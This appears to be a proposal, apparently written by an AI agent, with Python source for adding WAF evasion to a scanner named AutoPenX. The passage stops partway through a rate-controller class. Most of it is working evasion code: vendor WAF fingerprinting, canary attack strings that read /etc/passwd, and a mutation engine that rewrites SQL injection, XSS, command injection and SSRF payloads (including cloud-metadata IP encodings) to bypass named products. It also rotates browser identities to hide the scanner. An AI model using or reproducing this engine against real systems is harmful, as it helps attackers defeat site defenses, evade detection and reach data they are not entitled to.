"""
╔══════════════════════════════════════════════════════════════════════════════╗
║              AutoPenX WAF/IDS Evasion System — Complete Proposal            ║
║                    Defensive Evasion Expert Agent Review                     ║
╚══════════════════════════════════════════════════════════════════════════════╝

Target path layout after implementation:

    autopnex/
    ├── evasion/
    │   ├── __init__.py
    │   ├── waf_detector.py        # Module 1: WAF fingerprinting
    │   ├── payload_mutator.py     # Module 2: Payload mutation engine
    │   ├── rate_controller.py     # Module 3: Adaptive rate & fingerprint control
    │   └── evasion_middleware.py   # Module 4: Integration layer (_http.py middleware)
    ├── tools/
    │   └── _http.py               # Modified: plugs into evasion middleware
    └── ...

    config/
    └── settings.py                # Modified: new evasion env vars

"""

# ═══════════════════════════════════════════════════════════════════════════════
#  DIAGNOSIS: Why AutoPenX Fails Against WAFs (Current State)
# ═══════════════════════════════════════════════════════════════════════════════
#
#  1. FINGERPRINTING — User-Agent "AutoPenX/0.1" is an immediate giveaway.
#     WAFs pattern-match on known scanner UAs. This alone causes instant blocking.
#
#  2. RAW PAYLOADS — Every detector sends payloads verbatim:
#       sqli_detector:  ' AND SLEEP(5)-- -
#       xss_detector:   <script>alert(1)</script>
#       cmdi_detector:  ; sleep 5
#     ModSecurity CRS rules 942100-942999 catch all of these in plaintext.
#
#  3. NO ADAPTIVE BEHAVIOR — When a WAF returns 403/406/429, the tool
#     continues firing the remaining payloads unchanged. No backoff,
#     no mutation, no awareness that it's blocked.
#
#  4. STATIC HEADERS — _default_headers() returns the same Accept,
#     Accept-Language every time. Header fingerprinting is trivial.
#
#  5. NO WAF DETECTION — The tool cannot even determine if a WAF exists,
#     so it can't adapt strategy. tech_detector.py checks for server tech
#     but has zero WAF signatures.
#
#  6. PREDICTABLE TIMING — request_delay is a flat constant. Any
#     statistical analysis of request intervals reveals automation.
#

# ═══════════════════════════════════════════════════════════════════════════════
#  MODULE 1: WAF DETECTOR  (autopnex/evasion/waf_detector.py)
# ═══════════════════════════════════════════════════════════════════════════════

from __future__ import annotations

import re
from dataclasses import dataclass, field
from enum import Enum
from typing import Any, Dict, List, Optional, Tuple


class WAFVendor(Enum):
    UNKNOWN = "unknown"
    CLOUDFLARE = "cloudflare"
    AWS_WAF = "aws_waf"
    MODSECURITY = "modsecurity"
    IMPERVA = "imperva"
    AKAMAI = "akamai"
    F5_ASM = "f5_asm"
    SUCURI = "sucuri"
    BARRACUDA = "barracuda"
    FORTIWEB = "fortiweb"
    WALLARM = "wallarm"
    WORDFENCE = "wordfence"
    CLOUDFRONT = "cloudfront"
    AZURE_FRONT_DOOR = "azure_front_door"
    GENERIC = "generic"  # WAF detected but vendor unknown


@dataclass
class WAFInfo:
    detected: bool = False
    vendor: WAFVendor = WAFVendor.UNKNOWN
    confidence: float = 0.0  # 0.0–1.0
    evidence: List[str] = field(default_factory=list)
    block_status_code: Optional[int] = None
    block_page_fingerprint: str = ""
    headers_seen: Dict[str, str] = field(default_factory=dict)
    recommended_level: str = "aggressive"  # light | aggressive


# ── WAF Signature Database ──────────────────────────────────────────────────

WAF_SIGNATURES: Dict[WAFVendor, Dict[str, Any]] = {
    WAFVendor.CLOUDFLARE: {
        "headers": {
            "cf-ray": r".+",
            "cf-cache-status": r".+",
            "server": r"cloudflare",
            "cf-mitigated": r".+",
        },
        "cookies": [r"__cfduid", r"__cf_bm", r"cf_clearance"],
        "body_patterns": [
            r"Attention Required.*Cloudflare",
            r"ray ID:",
            r"cf-error-details",
            r"cloudflare\.com/5xx-error",
        ],
        "block_codes": [403, 503, 1020],
    },
    WAFVendor.AWS_WAF: {
        "headers": {
            "x-amzn-requestid": r".+",
            "x-amzn-trace-id": r".+",
            "x-amz-cf-id": r".+",
        },
        "cookies": [r"awsalb", r"awsalbcors"],
        "body_patterns": [
            r"<html>.*Request blocked",
            r"automated access",
        ],
        "block_codes": [403],
    },
    WAFVendor.MODSECURITY: {
        "headers": {
            "server": r"mod_security|NOYB|modsecurity",
        },
        "cookies": [],
        "body_patterns": [
            r"Mod_Security",
            r"ModSecurity",
            r"NOYB",
            r"This error was generated by Mod_Security",
            r"rules triggered",
            r"Not Acceptable!.*The requested URL",
        ],
        "block_codes": [403, 406, 501],
    },
    WAFVendor.IMPERVA: {
        "headers": {
            "x-cdn": r"Incapsula|Imperva",
            "x-iinfo": r".+",
        },
        "cookies": [r"incap_ses_", r"visid_incap_", r"nlbi_"],
        "body_patterns": [
            r"Incapsula incident ID",
            r"Powered By Incapsula",
            r"_Incapsula_Resource",
            r"request unsuccessful.*incapsula",
        ],
        "block_codes": [403],
    },
    WAFVendor.AKAMAI: {
        "headers": {
            "server": r"AkamaiGHost",
            "x-akamai-session-info": r".+",
        },
        "cookies": [r"akamai", r"ak_bmsc", r"bm_sv"],
        "body_patterns": [
            r"Access Denied.*akamai",
            r"Reference\s*#\d+\.\w+\.\d+",
        ],
        "block_codes": [403],
    },
    WAFVendor.F5_ASM: {
        "headers": {
            "server": r"BigIP|BIG-IP|F5",
            "x-wa-info": r".+",
        },
        "cookies": [r"TS[0-9a-f]+", r"BIGipServer"],
        "body_patterns": [
            r"The requested URL was rejected",
            r"support ID.*is:.*\d+",
            r"F5 Networks",
        ],
        "block_codes": [403],
    },
    WAFVendor.SUCURI: {
        "headers": {
            "server": r"Sucuri",
            "x-sucuri-id": r".+",
            "x-sucuri-cache": r".+",
        },
        "cookies": [r"sucuri_cloudproxy"],
        "body_patterns": [
            r"Access Denied.*Sucuri",
            r"Sucuri WebSite Firewall",
            r"cloudproxy@sucuri\.net",
        ],
        "block_codes": [403],
    },
    WAFVendor.BARRACUDA: {
        "headers": {
            "server": r"Barracuda",
        },
        "cookies": [r"barra_counter_session", r"BNI_persistence"],
        "body_patterns": [r"Barracuda Networks"],
        "block_codes": [403],
    },
    WAFVendor.FORTIWEB: {
        "headers": {
            "server": r"FortiWeb",
        },
        "cookies": [r"FORTIWAFSID"],
        "body_patterns": [r"FortiWeb", r"\.fwb_"],
        "block_codes": [403],
    },
    WAFVendor.WALLARM: {
        "headers": {
            "server": r"nginx-wallarm",
        },
        "cookies": [],
        "body_patterns": [r"wallarm", r"ngx_lua"],
        "block_codes": [403],
    },
    WAFVendor.WORDFENCE: {
        "headers": {},
        "cookies": [r"wfwaf-authcookie"],
        "body_patterns": [
            r"Generated by Wordfence",
            r"This response was generated by Wordfence",
            r"wordfence",
        ],
        "block_codes": [403, 503],
    },
    WAFVendor.CLOUDFRONT: {
        "headers": {
            "x-amz-cf-id": r".+",
            "x-amz-cf-pop": r".+",
            "server": r"CloudFront",
        },
        "cookies": [],
        "body_patterns": [
            r"ERROR.*CloudFront",
            r"Generated by cloudfront",
        ],
        "block_codes": [403],
    },
    WAFVendor.AZURE_FRONT_DOOR: {
        "headers": {
            "x-azure-ref": r".+",
            "x-fd-healthprobe": r".+",
        },
        "cookies": [],
        "body_patterns": [
            r"Azure Front Door",
        ],
        "block_codes": [403],
    },
}

# ── Canary payloads: known-bad strings that any WAF should block ────────────

CANARY_PAYLOADS = [
    "<script>alert('xss_canary')</script>",
    "' OR 1=1--",
    "../../etc/passwd",
    "; cat /etc/passwd",
]


class WAFDetector:
    """
    Two-phase WAF detection:
      Phase 1 (passive): Send a benign GET / and analyze response headers,
                         cookies, and body for known WAF fingerprints.
      Phase 2 (active):  Send a canary malicious payload and compare the
                         response to the benign baseline. If the response
                         diverges (different status, block page), confirm WAF.

    Usage:
        from autopnex.evasion.waf_detector import WAFDetector
        detector = WAFDetector()
        info = detector.detect("https://target.example.com")
        print(info.vendor, info.confidence, info.evidence)
    """

    def __init__(self):
        self._signatures = WAF_SIGNATURES

    def detect(self, target_url: str) -> WAFInfo:
        from autopnex.tools._http import request, normalise_target

        target = normalise_target(target_url)
        info = WAFInfo()

        # ── Phase 1: Passive fingerprint from benign request ────────────
        resp_benign, err, _ = request("GET", target)
        if resp_benign is None:
            info.evidence.append(f"benign request failed: {err}")
            return info

        benign_status = resp_benign.status_code
        benign_headers = dict(resp_benign.headers)
        benign_body = (resp_benign.text or "")[:8000]
        benign_cookies = resp_benign.headers.get("set-cookie", "")
        info.headers_seen = {k.lower(): v for k, v in benign_headers.items()}

        vendor_scores: Dict[WAFVendor, float] = {}

        for vendor, sigs in self._signatures.items():
            score = 0.0

            # Check response headers
            for header_name, pattern in sigs.get("headers", {}).items():
                header_val = benign_headers.get(header_name, "")
                if not header_val:
                    for k, v in benign_headers.items():
                        if k.lower() == header_name.lower():
                            header_val = v
                            break
                if header_val and re.search(pattern, header_val, re.IGNORECASE):
                    score += 0.3
                    info.evidence.append(
                        f"header match: {header_name}={header_val!r} → {vendor.value}"
                    )

            # Check cookies
            for cookie_pat in sigs.get("cookies", []):
                if re.search(cookie_pat, benign_cookies, re.IGNORECASE):
                    score += 0.25
                    info.evidence.append(
                        f"cookie match: {cookie_pat} → {vendor.value}"
                    )

            # Check body patterns (on benign — some WAFs inject JS challenges)
            for body_pat in sigs.get("body_patterns", []):
                if re.search(body_pat, benign_body, re.IGNORECASE):
                    score += 0.2
                    info.evidence.append(
                        f"body match (benign): {body_pat!r} → {vendor.value}"
                    )

            if score > 0:
                vendor_scores[vendor] = min(score, 1.0)

        # ── Phase 2: Active probe with canary payload ────────────────
        canary = CANARY_PAYLOADS[0]
        canary_url = target.rstrip("/") + f"/?q={canary}"
        resp_canary, err_canary, _ = request("GET", canary_url)

        if resp_canary is not None:
            canary_status = resp_canary.status_code
            canary_body = (resp_canary.text or "")[:8000]

            # Status divergence: benign was 200 but canary is 403/406/429/503
            if benign_status == 200 and canary_status in (403, 406, 429, 451, 501, 503):
                info.block_status_code = canary_status
                info.evidence.append(
                    f"status divergence: benign={benign_status}, canary={canary_status}"
                )
                for vendor, sigs in self._signatures.items():
                    if canary_status in sigs.get("block_codes", []):
                        vendor_scores[vendor] = vendor_scores.get(vendor, 0) + 0.3

                    for body_pat in sigs.get("body_patterns", []):
                        if re.search(body_pat, canary_body, re.IGNORECASE):
                            vendor_scores[vendor] = vendor_scores.get(vendor, 0) + 0.35
                            info.evidence.append(
                                f"body match (canary block page): {body_pat!r} → {vendor.value}"
                            )

                # Generic WAF detection even if no vendor matched
                if not vendor_scores:
                    vendor_scores[WAFVendor.GENERIC] = 0.6
                    info.evidence.append("canary blocked but no vendor signature matched")

            # Body length divergence: if canary response is vastly different
            len_delta = abs(len(canary_body) - len(benign_body))
            if len_delta > max(500, 0.5 * len(benign_body)) and canary_status != benign_status:
                info.evidence.append(
                    f"body length divergence: benign={len(benign_body)}, canary={len(canary_body)}"
                )

        elif err_canary:
            # Connection reset / timeout on canary can indicate aggressive WAF
            info.evidence.append(f"canary request failed: {err_canary} (possible connection-level block)")

        # ── Determine winner ────────────────────────────────────────
        if vendor_scores:
            best_vendor = max(vendor_scores, key=vendor_scores.get)
            best_score = vendor_scores[best_vendor]
            info.detected = True
            info.vendor = best_vendor
            info.confidence = min(best_score, 1.0)
            info.recommended_level = "aggressive" if best_score >= 0.5 else "light"
        else:
            info.detected = False
            info.vendor = WAFVendor.UNKNOWN
            info.confidence = 0.0

        return info


# ═══════════════════════════════════════════════════════════════════════════════
#  MODULE 2: PAYLOAD MUTATOR ENGINE  (autopnex/evasion/payload_mutator.py)
# ═══════════════════════════════════════════════════════════════════════════════

import random
import string
import urllib.parse
from typing import Callable


class MutationStrategy:
    """A named transformation function that takes a payload string and returns a mutated variant."""

    def __init__(self, name: str, fn: Callable[[str], str], vuln_types: Optional[List[str]] = None):
        self.name = name
        self.fn = fn
        self.vuln_types = vuln_types  # None means applies to all

    def apply(self, payload: str) -> str:
        return self.fn(payload)


# ── Universal encoding mutations ────────────────────────────────────────────

def _double_url_encode(payload: str) -> str:
    """Encode each byte twice: ' → %27 → %2527. Bypasses single-decode WAFs."""
    first = urllib.parse.quote(payload, safe="")
    return urllib.parse.quote(first, safe="")


def _unicode_normalization(payload: str) -> str:
    """Replace ASCII chars with Unicode fullwidth equivalents (U+FF01..U+FF5E).
    WAF regex operates on ASCII; backend normalizes fullwidth → ASCII."""
    result = []
    for ch in payload:
        code = ord(ch)
        if 0x21 <= code <= 0x7E:
            result.append(chr(code - 0x21 + 0xFF01))
        else:
            result.append(ch)
    return "".join(result)


def _hex_encode_chars(payload: str) -> str:
    """Replace key SQL/XSS trigger chars with hex URL encoding."""
    replacements = {
        "'": "%27", '"': "%22", "<": "%3C", ">": "%3E",
        "(": "%28", ")": "%29", " ": "%20", ";": "%3B",
        "|": "%7C", "&": "%26", "=": "%3D",
    }
    result = payload
    for char, enc in replacements.items():
        result = result.replace(char, enc)
    return result


def _html_entity_encode(payload: str) -> str:
    """Replace characters with HTML decimal/hex entities. Useful for XSS in HTML context."""
    result = []
    for ch in payload:
        if ch in "<>\"'&;()=/":
            if random.random() > 0.5:
                result.append(f"&#{ord(ch)};")
            else:
                result.append(f"&#x{ord(ch):x};")
        else:
            result.append(ch)
    return "".join(result)


def _mixed_case_keywords(payload: str) -> str:
    """Randomly alternate case in SQL keywords: SELECT → SeLeCt.
    ModSecurity CRS rule 942190 checks case-insensitive, but some
    simpler WAFs only check exact case."""
    sql_keywords = [
        "SELECT", "UNION", "INSERT", "UPDATE", "DELETE", "DROP",
        "FROM", "WHERE", "AND", "OR", "NOT", "NULL", "LIKE",
        "ORDER", "BY", "GROUP", "HAVING", "LIMIT", "SLEEP",
        "BENCHMARK", "WAITFOR", "DELAY", "INTO", "OUTFILE",
        "LOAD_FILE", "CONCAT", "CHAR", "TABLE", "DATABASE",
        "INFORMATION_SCHEMA", "pg_sleep",
    ]
    result = payload
    for kw in sql_keywords:
        import re as _re
        def _randomize_case(match):
            return "".join(
                c.upper() if random.random() > 0.5 else c.lower()
                for c in match.group(0)
            )
        result = _re.sub(r'\b' + _re.escape(kw) + r'\b', _randomize_case, result, flags=_re.IGNORECASE)
    return result


# ── SQL injection specific mutations ────────────────────────────────────────

def _sql_comment_insertion(payload: str) -> str:
    """Insert inline comments between characters of SQL keywords:
    SELECT → S/**/E/**/L/**/E/**/C/**/T
    Bypasses regex that looks for contiguous keyword strings."""
    sql_keywords = [
        "SELECT", "UNION", "FROM", "WHERE", "AND", "OR", "INSERT",
        "UPDATE", "DELETE", "DROP", "SLEEP", "BENCHMARK", "WAITFOR",
        "DELAY", "CONCAT", "ORDER", "GROUP", "HAVING",
    ]
    result = payload
    for kw in sql_keywords:
        pattern = re.compile(re.escape(kw), re.IGNORECASE)
        def _insert_comments(match):
            word = match.group(0)
            return "/**/".join(word)
        result = pattern.sub(_insert_comments, result)
    return result


def _sql_whitespace_substitution(payload: str) -> str:
    """Replace spaces with SQL-valid whitespace alternatives.
    Tabs, newlines, and /**/ comments are valid SQL whitespace."""
    alternatives = ["\t", "\n", "/**/", "%09", "%0a", "%0d"]
    result = ""
    for ch in payload:
        if ch == " ":
            result += random.choice(alternatives)
        else:
            result += ch
    return result


def _sql_alternative_syntax(payload: str) -> str:
    """Replace common SQL functions with equivalent alternatives.
    E.g., CONCAT('a','b') → 'a'||'b' (PostgreSQL/Oracle)
          SLEEP(5) → BENCHMARK(5000000,SHA1('x')) (MySQL alternative)"""
    replacements = [
        (r"SLEEP\((\d+)\)", r"BENCHMARK(\g<1>000000,SHA1('x'))"),
        (r"UNION\s+SELECT", "UNION ALL SELECT"),
        (r"OR\s+1=1", "OR 2>1"),
        (r"AND\s+1=1", "AND 2-1=1"),
        (r"AND\s+1=2", "AND 1>2"),
    ]
    result = payload
    for pat, repl in replacements:
        result = re.sub(pat, repl, result, flags=re.IGNORECASE)
    return result


def _sql_hex_string(payload: str) -> str:
    """Convert string literals to MySQL hex notation: 'admin' → 0x61646D696E."""
    def _to_hex(match):
        s = match.group(1)
        hex_val = s.encode().hex()
        return f"0x{hex_val}"
    return re.sub(r"'([a-zA-Z0-9_]+)'", _to_hex, payload)


def _sql_char_function(payload: str) -> str:
    """Convert string literals to CHAR() calls: 'a' → CHAR(97).
    Bypasses string-literal pattern matching."""
    def _to_char(match):
        s = match.group(1)
        chars = ",".join(str(ord(c)) for c in s)
        return f"CONCAT(CHAR({chars}))"
    return re.sub(r"'([a-zA-Z0-9_]+)'", _to_char, payload)


# ── XSS specific mutations ─────────────────────────────────────────────────

def _xss_svg_payload(payload: str) -> str:
    """Replace <script> blocks with SVG-based vectors.
    <script>X</script> → <svg/onload=X>"""
    result = re.sub(
        r"<script>(.*?)</script>",
        lambda m: f"<svg/onload={m.group(1)}>",
        payload,
        flags=re.IGNORECASE | re.DOTALL,
    )
    return result


def _xss_img_onerror(payload: str) -> str:
    """Replace <script> with <img src=x onerror=...> vectors."""
    result = re.sub(
        r"<script>(.*?)</script>",
        lambda m: f'<img src=x onerror={m.group(1)}>',
        payload,
        flags=re.IGNORECASE | re.DOTALL,
    )
    return result


def _xss_template_literal(payload: str) -> str:
    """Use JavaScript template literals to break up alert():
    alert(1) → alert`1` or ${alert(1)}"""
    return payload.replace("alert(1)", "alert`1`").replace("alert('", "${alert('")


def _xss_javascript_protocol(payload: str) -> str:
    """Use javascript: protocol with entity encoding:
    javascript:alert(1) → java&#115;cript:alert(1)"""
    return payload.replace("javascript:", "java&#115;cript:").replace(
        "javascript:", "java\tscript:"
    )


def _xss_event_handler_variants(payload: str) -> str:
    """Replace common event handlers with less-monitored alternatives.
    onerror → onfocus/onmouseover/onauxclick"""
    alternatives = ["onfocus", "onmouseover", "onauxclick", "ontoggle", "onpointerover"]
    chosen = random.choice(alternatives)
    return payload.replace("onerror=", f"{chosen}=").replace("onload=", f"{chosen}=")


def _xss_encoding_bypass(payload: str) -> str:
    """Mix URL encoding, HTML entities, and JS escapes within XSS payloads."""
    result = payload
    result = result.replace("<", "\\x3c").replace(">", "\\x3e")
    return result


# ── Command injection specific mutations ────────────────────────────────────

def _cmdi_ifs_substitution(payload: str) -> str:
    """Replace spaces with $IFS (Internal Field Separator) in shell commands.
    ; cat /etc/passwd → ;cat${IFS}/etc/passwd
    Bypasses WAFs that require space-after-semicolon patterns."""
    result = payload.replace(" ", "${IFS}")
    return result


def _cmdi_hex_escaping(payload: str) -> str:
    """Replace command chars with hex: ; → $'\\x3b', | → $'\\x7c'.
    Bash interprets $'\\xHH' as the literal character."""
    replacements = {
        ";": "$'\\x3b'", "|": "$'\\x7c'", "&": "$'\\x26'",
        " ": "$'\\x20'",
    }
    result = payload
    for char, esc in replacements.items():
        result = result.replace(char, esc)
    return result


def _cmdi_backtick_substitution(payload: str) -> str:
    """Replace $() with backtick notation: $(sleep 5) → `sleep 5`."""
    return re.sub(r"\$\(([^)]+)\)", r"`\1`", payload)


def _cmdi_variable_expansion(payload: str) -> str:
    """Insert empty variable expansions to break up command names:
    sleep → sl${x}eep, cat → c${x}at
    Bash ignores undefined variables, but WAF regex won't match 'sl${x}eep'."""
    commands = ["sleep", "cat", "id", "whoami", "ls", "dir", "ping", "curl", "wget", "nc"]
    result = payload
    for cmd in commands:
        if cmd in result:
            mid = len(cmd) // 2
            broken = cmd[:mid] + "${z}" + cmd[mid:]
            result = result.replace(cmd, broken, 1)
    return result


def _cmdi_newline_injection(payload: str) -> str:
    """Use URL-encoded newlines as command separators:
    ; sleep 5 → %0asleep%205"""
    result = payload
    for sep in [";", "&&", "||", "|"]:
        result = result.replace(sep, "%0a")
    return result


# ── SSRF specific mutations ─────────────────────────────────────────────────

def _ssrf_ip_encoding(payload: str) -> str:
    """Convert 127.0.0.1 to decimal (2130706433), octal (0177.0.0.01),
    hex (0x7f000001), or IPv6-mapped (::ffff:127.0.0.1) forms.
    Many SSRF filters check string '127.0.0.1' but not numeric equivalents."""
    alternatives = {
        "127.0.0.1": [
            "2130706433",           # decimal IP
            "0x7f000001",           # hex IP
            "0177.0.0.01",          # octal
            "127.1",                # abbreviated
            "127.0.1",              # abbreviated variant
            "0:0:0:0:0:ffff:127.0.0.1",  # IPv6-mapped
            "::ffff:7f00:1",        # compressed IPv6-mapped
        ],
        "169.254.169.254": [
            "0xa9fea9fe",           # hex
            "2852039166",           # decimal
            "0251.0376.0251.0376",  # octal
        ],
        "localhost": [
            "127.0.0.1",
            "127.1",
            "[::1]",
            "0x7f000001",
            "localhost.",           # trailing dot
        ],
    }
    result = payload
    for original, alts in alternatives.items():
        if original in result:
            result = result.replace(original, random.choice(alts), 1)
    return result


def _ssrf_url_tricks(payload: str) -> str:
    """Apply URL-based SSRF bypass tricks:
    - Alternate schemes: http:// → gopher://, dict://, file://
    - URL authentication: http://attacker@127.0.0.1/
    - DNS rebinding placeholder: http://spoofed.burpcollaborator.net/"""
    result = payload
    if "http://" in result:
        tricks = [
            result.replace("http://", "http://anything@"),
            result.replace("http://127.0.0.1", "http://127.0.0.1.nip.io"),
            result.replace("http://", "gopher://"),
        ]
        result = random.choice(tricks)
    return result


# ── Mutation Pipeline ───────────────────────────────────────────────────────

UNIVERSAL_STRATEGIES = [
    MutationStrategy("double_url_encode", _double_url_encode),
    MutationStrategy("unicode_fullwidth", _unicode_normalization),
    MutationStrategy("hex_encode", _hex_encode_chars),
]

SQLI_STRATEGIES = [
    MutationStrategy("case_alternation", _mixed_case_keywords, ["sqli"]),
    MutationStrategy("comment_insertion", _sql_comment_insertion, ["sqli"]),
    MutationStrategy("whitespace_sub", _sql_whitespace_substitution, ["sqli"]),
    MutationStrategy("alt_syntax", _sql_alternative_syntax, ["sqli"]),
    MutationStrategy("hex_string", _sql_hex_string, ["sqli"]),
    MutationStrategy("char_function", _sql_char_function, ["sqli"]),
]

XSS_STRATEGIES = [
    MutationStrategy("svg_payload", _xss_svg_payload, ["xss"]),
    MutationStrategy("img_onerror", _xss_img_onerror, ["xss"]),
    MutationStrategy("template_literal", _xss_template_literal, ["xss"]),
    MutationStrategy("js_protocol", _xss_javascript_protocol, ["xss"]),
    MutationStrategy("event_handler_swap", _xss_event_handler_variants, ["xss"]),
    MutationStrategy("html_entity", _html_entity_encode, ["xss"]),
    MutationStrategy("encoding_bypass", _xss_encoding_bypass, ["xss"]),
]

CMDI_STRATEGIES = [
    MutationStrategy("ifs_sub", _cmdi_ifs_substitution, ["cmdi"]),
    MutationStrategy("hex_escape", _cmdi_hex_escaping, ["cmdi"]),
    MutationStrategy("backtick_sub", _cmdi_backtick_substitution, ["cmdi"]),
    MutationStrategy("var_expansion", _cmdi_variable_expansion, ["cmdi"]),
    MutationStrategy("newline_inject", _cmdi_newline_injection, ["cmdi"]),
]

SSRF_STRATEGIES = [
    MutationStrategy("ip_encoding", _ssrf_ip_encoding, ["ssrf"]),
    MutationStrategy("url_tricks", _ssrf_url_tricks, ["ssrf"]),
]

STRATEGY_MAP: Dict[str, List[MutationStrategy]] = {
    "sqli": UNIVERSAL_STRATEGIES + SQLI_STRATEGIES,
    "xss": UNIVERSAL_STRATEGIES + XSS_STRATEGIES,
    "cmdi": UNIVERSAL_STRATEGIES + CMDI_STRATEGIES,
    "ssrf": SSRF_STRATEGIES,
}

# WAF-specific strategy preferences: which mutations are most effective
# against each WAF vendor, ordered by historical bypass success rate.
WAF_STRATEGY_PRIORITY: Dict[WAFVendor, Dict[str, List[str]]] = {
    WAFVendor.MODSECURITY: {
        "sqli": ["comment_insertion", "whitespace_sub", "case_alternation", "hex_string", "double_url_encode"],
        "xss": ["html_entity", "svg_payload", "event_handler_swap", "encoding_bypass"],
        "cmdi": ["var_expansion", "ifs_sub", "newline_inject"],
    },
    WAFVendor.CLOUDFLARE: {
        "sqli": ["unicode_fullwidth", "double_url_encode", "char_function", "whitespace_sub"],
        "xss": ["encoding_bypass", "template_literal", "svg_payload", "unicode_fullwidth"],
        "cmdi": ["hex_escape", "var_expansion", "ifs_sub"],
    },
    WAFVendor.IMPERVA: {
        "sqli": ["case_alternation", "comment_insertion", "alt_syntax", "double_url_encode"],
        "xss": ["img_onerror", "event_handler_swap", "html_entity"],
        "cmdi": ["ifs_sub", "backtick_sub", "var_expansion"],
    },
    WAFVendor.AWS_WAF: {
        "sqli": ["whitespace_sub", "hex_string", "comment_insertion", "double_url_encode"],
        "xss": ["svg_payload", "html_entity", "encoding_bypass"],
        "cmdi": ["var_expansion", "newline_inject"],
    },
}


class PayloadMutator:
    """
    Core mutation engine. Takes a base payload and produces N variants
    using strategies appropriate for the vulnerability type and detected WAF.

    Usage:
        mutator = PayloadMutator()
        variants = mutator.mutate(
            payload="' AND SLEEP(5)-- -",
            vuln_type="sqli",
            waf_type=WAFVendor.MODSECURITY,
            max_variants=10,
        )
        for v in variants:
            print(v["strategy"], v["payload"])
    """

    def __init__(self, seed: Optional[int] = None):
        if seed is not None:
            random.seed(seed)

    def mutate(
        self,
        payload: str,
        vuln_type: str,
        waf_type: WAFVendor = WAFVendor.UNKNOWN,
        max_variants: int = 8,
        level: str = "aggressive",
    ) -> List[Dict[str, str]]:
        """
        Returns list of {"strategy": name, "payload": mutated_string}.
        The original payload is always included as the first element.
        """
        strategies = list(STRATEGY_MAP.get(vuln_type, UNIVERSAL_STRATEGIES))
        variants: List[Dict[str, str]] = [
            {"strategy": "original", "payload": payload}
        ]

        # Prioritize strategies known to work against the detected WAF
        priority_names = (
            WAF_STRATEGY_PRIORITY
            .get(waf_type, {})
            .get(vuln_type, [])
        )

        if priority_names and level == "aggressive":
            priority_strats = [s for s in strategies if s.name in priority_names]
            remaining = [s for s in strategies if s.name not in priority_names]
            ordered = priority_strats + remaining
        else:
            ordered = strategies
            random.shuffle(ordered)

        seen = {payload}

        # Single-strategy mutations
        for strat in ordered:
            if len(variants) >= max_variants:
                break
            try:
                mutated = strat.apply(payload)
                if mutated and mutated not in seen:
                    seen.add(mutated)
                    variants.append({"strategy": strat.name, "payload": mutated})
            except Exception:
                continue

        # Chained mutations (combine 2 strategies) for aggressive mode
        if level == "aggressive" and len(variants) < max_variants:
            for i, s1 in enumerate(ordered):
                if len(variants) >= max_variants:
                    break
                for s2 in ordered[i + 1:]:
                    if len(variants) >= max_variants:
                        break
                    try:
                        chained = s2.apply(s1.apply(payload))
                        if chained and chained not in seen:
                            seen.add(chained)
                            variants.append({
                                "strategy": f"{s1.name}+{s2.name}",
                                "payload": chained,
                            })
                    except Exception:
                        continue

        return variants[:max_variants]

    def mutate_batch(
        self,
        payloads: List[str],
        vuln_type: str,
        waf_type: WAFVendor = WAFVendor.UNKNOWN,
        variants_per_payload: int = 4,
    ) -> List[Dict[str, str]]:
        """Mutate multiple base payloads. Used to expand the entire payload
        library for a vulnerability detector in one call."""
        all_variants = []
        for p in payloads:
            all_variants.extend(
                self.mutate(p, vuln_type, waf_type, max_variants=variants_per_payload)
            )
        return all_variants


# ═══════════════════════════════════════════════════════════════════════════════
#  MODULE 3: RATE CONTROLLER  (autopnex/evasion/rate_controller.py)
# ═══════════════════════════════════════════════════════════════════════════════

import time as _time
import threading


# ── Realistic browser User-Agent pool ───────────────────────────────────────

USER_AGENT_POOL = [
    # Chrome on Windows
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36",
    # Chrome on macOS
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36",
    # Firefox on Windows
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0",
    # Firefox on Linux
    "Mozilla/5.0 (X11; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0",
    # Safari on macOS
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15",
    # Edge on Windows
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0",
    # Chrome on Android
    "Mozilla/5.0 (Linux; Android 14; Pixel 8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Mobile Safari/537.36",
    # Safari on iOS
    "Mozilla/5.0 (iPhone; CPU iPhone OS 17_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1",
]

# ── Realistic Accept-Language combinations ──────────────────────────────────

ACCEPT_LANGUAGE_POOL = [
    "en-US,en;q=0.9",
    "en-US,en;q=0.9,es;q=0.8",
    "en-GB,en;q=0.9,en-US;q=0.8",
    "en-US,en;q=0.9,fr;q=0.8",
    "en-US,en;q=0.9,de;q=0.8,fr;q=0.7",
    "zh-CN,zh;q=0.9,en;q=0.8",
    "ja,en-US;q=0.9,en;q=0.8",
]

# ── Accept header variations ────────────────────────────────────────────────

ACCEPT_POOL = [
    "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
    "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "*/*",
]

ACCEPT_ENCODING_POOL = [
    "gzip, deflate, br",
    "gzip, deflate, br, zstd",
    "gzip, deflate",
]


class RateController:
    """
    Adaptive rate limiting with:
      - Jitter: uniform random ± configurable percentage around base delay
      - Exponential backoff on 429/503/WAF-block responses
